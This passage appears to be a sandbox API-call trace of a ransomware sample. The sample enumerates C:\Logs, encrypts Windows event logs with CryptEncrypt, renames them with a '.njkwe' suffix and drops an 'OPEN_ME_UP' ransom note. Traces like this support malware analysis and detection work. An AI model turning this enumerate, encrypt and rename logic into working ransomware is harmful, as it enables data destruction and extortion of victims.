lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0067.102] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0067.102] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0067.102] CloseHandle (hObject=0x428) returned 1 [0067.128] GetProcessHeap () returned 0xbe0000 [0067.128] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0067.128] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx_r00t_{3sXlE5}.njkwe") returned 80 [0067.128] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-wmi-activity%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx_r00t_{3sXlE5}.njkwe" (normalized: "c:\\logs\\microsoft-windows-wmi-activity%4operational.evtx_r00t_{3sxle5}.njkwe")) returned 1 [0067.129] GetProcessHeap () returned 0xbe0000 [0067.129] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0067.129] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50555c8d, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50555c8d, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xf9a458f4, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x111000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Security.evtx", cAlternateFileName="SECURI~1.EVT")) returned 1 [0067.129] lstrcmpiW (lpString1="Security.evtx", lpString2="Windows") returned -1 [0067.129] lstrcmpiW (lpString1="Security.evtx", lpString2="$Recycle.bin") returned 1 [0067.129] lstrcmpiW (lpString1="Security.evtx", lpString2="System Volume Information") returned -1 [0067.129] lstrcmpiW (lpString1="Security.evtx", lpString2="Program Files") returned 1 [0067.129] lstrcmpiW (lpString1="Security.evtx", lpString2="Program Files (x86)") returned 1 [0067.129] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Logs\\Security.evtx") returned 25 [0067.129] StrStrIW (lpFirst="Security.evtx", lpSrch=".njkwe") returned 0x0 [0067.129] lstrcmpW (lpString1="Security.evtx", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0067.129] lstrcmpW (lpString1="Security.evtx", lpString2="taridd") returned -1 [0067.129] StrCmpNW (lpStr1="\\\\?\\C:\\Logs\\Security.evtx", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0067.129] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Security.evtx" (normalized: "c:\\logs\\security.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0067.129] GetTickCount () returned 0x11512c9 [0067.129] GetTickCount () returned 0x11512c9 [0067.129] GetTickCount () returned 0x11512c9 [0067.129] GetTickCount () returned 0x11512c9 [0067.129] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0067.130] GetProcessHeap () returned 0xbe0000 [0067.130] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0067.130] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0067.257] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0067.257] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0067.257] GetProcessHeap () returned 0xbe0000 [0067.257] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0067.257] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0067.257] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0067.260] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0067.260] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0067.260] CloseHandle (hObject=0x428) returned 1 [0067.260] GetProcessHeap () returned 0xbe0000 [0067.260] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0067.260] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\Logs\\Security.evtx_r00t_{3sXlE5}.njkwe") returned 45 [0067.260] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Security.evtx" (normalized: "c:\\logs\\security.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Security.evtx_r00t_{3sXlE5}.njkwe" (normalized: "c:\\logs\\security.evtx_r00t_{3sxle5}.njkwe")) returned 1 [0067.261] GetProcessHeap () returned 0xbe0000 [0067.261] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0067.261] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95a6db2c, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x95a6db2c, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1d86ba0, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Setup.evtx", cAlternateFileName="SETUP~1.EVT")) returned 1 [0067.261] lstrcmpiW (lpString1="Setup.evtx", lpString2="Windows") returned -1 [0067.261] lstrcmpiW (lpString1="Setup.evtx", lpString2="$Recycle.bin") returned 1 [0067.261] lstrcmpiW (lpString1="Setup.evtx", lpString2="System Volume Information") returned -1 [0067.261] lstrcmpiW (lpString1="Setup.evtx", lpString2="Program Files") returned 1 [0067.262] lstrcmpiW (lpString1="Setup.evtx", lpString2="Program Files (x86)") returned 1 [0067.262] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Logs\\Setup.evtx") returned 22 [0067.262] StrStrIW (lpFirst="Setup.evtx", lpSrch=".njkwe") returned 0x0 [0067.262] lstrcmpW (lpString1="Setup.evtx", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0067.262] lstrcmpW (lpString1="Setup.evtx", lpString2="taridd") returned -1 [0067.262] StrCmpNW (lpStr1="\\\\?\\C:\\Logs\\Setup.evtx", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0067.262] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Setup.evtx" (normalized: "c:\\logs\\setup.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0067.262] GetTickCount () returned 0x1151355 [0067.262] GetTickCount () returned 0x1151355 [0067.262] GetTickCount () returned 0x1151355 [0067.262] GetTickCount () returned 0x1151355 [0067.262] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0067.263] GetProcessHeap () returned 0xbe0000 [0067.263] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0067.263] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0067.265] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0067.265] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0067.265] GetProcessHeap () returned 0xbe0000 [0067.265] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0067.265] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0067.265] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0067.265] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0067.265] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0067.266] CloseHandle (hObject=0x428) returned 1 [0067.266] GetProcessHeap () returned 0xbe0000 [0067.266] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0067.266] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\Logs\\Setup.evtx_r00t_{3sXlE5}.njkwe") returned 42 [0067.266] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Setup.evtx" (normalized: "c:\\logs\\setup.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Setup.evtx_r00t_{3sXlE5}.njkwe" (normalized: "c:\\logs\\setup.evtx_r00t_{3sxle5}.njkwe")) returned 1 [0067.266] GetProcessHeap () returned 0xbe0000 [0067.266] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0067.266] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x505097c4, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x505097c4, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x111000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="System.evtx", cAlternateFileName="SYSTEM~1.EVT")) returned 1 [0067.266] lstrcmpiW (lpString1="System.evtx", lpString2="Windows") returned -1 [0067.266] lstrcmpiW (lpString1="System.evtx", lpString2="$Recycle.bin") returned 1 [0067.266] lstrcmpiW (lpString1="System.evtx", lpString2="System Volume Information") returned 1 [0067.266] lstrcmpiW (lpString1="System.evtx", lpString2="Program Files") returned 1 [0067.266] lstrcmpiW (lpString1="System.evtx", lpString2="Program Files (x86)") returned 1 [0067.266] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Logs\\System.evtx") returned 23 [0067.266] StrStrIW (lpFirst="System.evtx", lpSrch=".njkwe") returned 0x0 [0067.266] lstrcmpW (lpString1="System.evtx", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0067.266] lstrcmpW (lpString1="System.evtx", lpString2="taridd") returned -1 [0067.267] StrCmpNW (lpStr1="\\\\?\\C:\\Logs\\System.evtx", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0067.267] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\System.evtx" (normalized: "c:\\logs\\system.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0067.267] GetTickCount () returned 0x1151355 [0067.267] GetTickCount () returned 0x1151355 [0067.267] GetTickCount () returned 0x1151355 [0067.267] GetTickCount () returned 0x1151355 [0067.267] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0067.267] GetProcessHeap () returned 0xbe0000 [0067.267] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0067.268] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0067.269] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0067.270] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0067.270] GetProcessHeap () returned 0xbe0000 [0067.270] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0067.270] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0067.270] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0067.272] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0067.272] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0067.272] CloseHandle (hObject=0x428) returned 1 [0067.272] GetProcessHeap () returned 0xbe0000 [0067.272] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0067.272] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\Logs\\System.evtx_r00t_{3sXlE5}.njkwe") returned 43 [0067.272] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\System.evtx" (normalized: "c:\\logs\\system.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\System.evtx_r00t_{3sXlE5}.njkwe" (normalized: "c:\\logs\\system.evtx_r00t_{3sxle5}.njkwe")) returned 1 [0067.273] GetProcessHeap () returned 0xbe0000 [0067.273] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0067.273] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50555c8d, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50555c8d, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Windows PowerShell.evtx", cAlternateFileName="WINDOW~1.EVT")) returned 1 [0067.273] lstrcmpiW (lpString1="Windows PowerShell.evtx", lpString2="Windows") returned 1 [0067.273] lstrcmpiW (lpString1="Windows PowerShell.evtx", lpString2="$Recycle.bin") returned 1 [0067.273] lstrcmpiW (lpString1="Windows PowerShell.evtx", lpString2="System Volume Information") returned 1 [0067.273] lstrcmpiW (lpString1="Windows PowerShell.evtx", lpString2="Program Files") returned 1 [0067.273] lstrcmpiW (lpString1="Windows PowerShell.evtx", lpString2="Program Files (x86)") returned 1 [0067.273] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Logs\\Windows PowerShell.evtx") returned 35 [0067.273] StrStrIW (lpFirst="Windows PowerShell.evtx", lpSrch=".njkwe") returned 0x0 [0067.273] lstrcmpW (lpString1="Windows PowerShell.evtx", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0067.273] lstrcmpW (lpString1="Windows PowerShell.evtx", lpString2="taridd") returned 1 [0067.273] StrCmpNW (lpStr1="\\\\?\\C:\\Logs\\Windows PowerShell.evtx", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0067.273] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Windows PowerShell.evtx" (normalized: "c:\\logs\\windows powershell.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0067.273] GetTickCount () returned 0x1151355 [0067.273] GetTickCount () returned 0x1151355 [0067.273] GetTickCount () returned 0x1151355 [0067.273] GetTickCount () returned 0x1151355 [0067.273] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0067.273] GetProcessHeap () returned 0xbe0000 [0067.273] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0067.273] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0067.275] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0067.275] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0067.276] GetProcessHeap () returned 0xbe0000 [0067.276] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0067.276] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0067.276] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0067.276] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0067.276] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0067.276] CloseHandle (hObject=0x428) returned 1 [0067.276] GetProcessHeap () returned 0xbe0000 [0067.276] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0067.276] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\Logs\\Windows PowerShell.evtx_r00t_{3sXlE5}.njkwe") returned 55 [0067.276] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Windows PowerShell.evtx" (normalized: "c:\\logs\\windows powershell.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Windows PowerShell.evtx_r00t_{3sXlE5}.njkwe" (normalized: "c:\\logs\\windows powershell.evtx_r00t_{3sxle5}.njkwe")) returned 1 [0067.277] GetProcessHeap () returned 0xbe0000 [0067.277] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0067.277] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50555c8d, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50555c8d, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Windows PowerShell.evtx", cAlternateFileName="WINDOW~1.EVT")) returned 0 [0067.277] FindClose (in: hFindFile=0xc1a060 | out: hFindFile=0xc1a060) returned 1 [0067.277] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Logs\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 43 [0067.277] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\logs\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0067.277] WriteFile (in: hFile=0x424, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380fa74, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380fa74*=0x351, lpOverlapped=0x0) returned 1 [0067.279] CloseHandle (hObject=0x424) returned 1 [0067.279] GetProcessHeap () returned 0xbe0000 [0067.279] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc263f8 | out: hHeap=0xbe0000) returned 1 [0067.279] FindNextFileW (in: hFindFile=0xc19720, lpFindFileData=0x380fd30 | out: lpFindFileData=0x380fd30*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6e97b025, ftCreationTime.dwHighDateTime=0x1d3275c, ftLastAccessTime.dwLowDateTime=0x6e97b025, ftLastAccessTime.dwHighDateTime=0x1d3275c, ftLastWriteTime.dwLowDateTime=0x47384f2, ftLastWriteTime.dwHighDateTime=0x1d4d600, nFileSizeHigh=0x0, nFileSizeLow=0x28000000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pagefile.sys", cAlternateFileName="")) returned 1 [0067.279] lstrcmpiW (lpString1="pagefile.sys", lpString2="Windows") returned -1 [0067.279] lstrcmpiW (lpString1="pagefile.sys", lpString2="$Recycle.bin") returned 1 [0067.279] lstrcmpiW (lpString1="pagefile.sys", lpString2="System Volume Information") returned -1 [0067.279] lstrcmpiW (lpString1="pagefile.sys", lpString2="Program Files") returned -1 [0067.279] lstrcmpiW (lpString1="pagefile.sys", lpString2="Program Files (x86)") returned -1 [0067.279] wnsprintfW (in: pszDest=0xc47aa0, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\pagefile.sys") returned 19 [0067.280] StrStrIW (lpFirst="pagefile.sys", lpSrch=".njkwe") returned 0x0 [0067.280] lstrcmpW (lpString1="pagefile.sys", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0067.280] lstrcmpW (lpString1="pagefile.sys", lpString2="taridd") returned -1 [0067.280] StrCmpNW (lpStr1="\\\\?\\C:\\pagefile.sys", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0067.280] CreateFileW (lpFileName="\\\\?\\C:\\pagefile.sys" (normalized: "c:\\pagefile.sys"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0067.280] FindNextFileW (in: hFindFile=0xc19720, lpFindFileData=0x380fd30 | out: lpFindFileData=0x380fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa03748ae, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17b3dd09, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PerfLogs", cAlternateFileName="")) returned 1 [0067.280] lstrcmpiW (lpString1="PerfLogs", lpString2="Windows") returned -1 [0067.280] lstrcmpiW (lpString1="PerfLogs", lpString2="$Recycle.bin") returned 1 [0067.280] 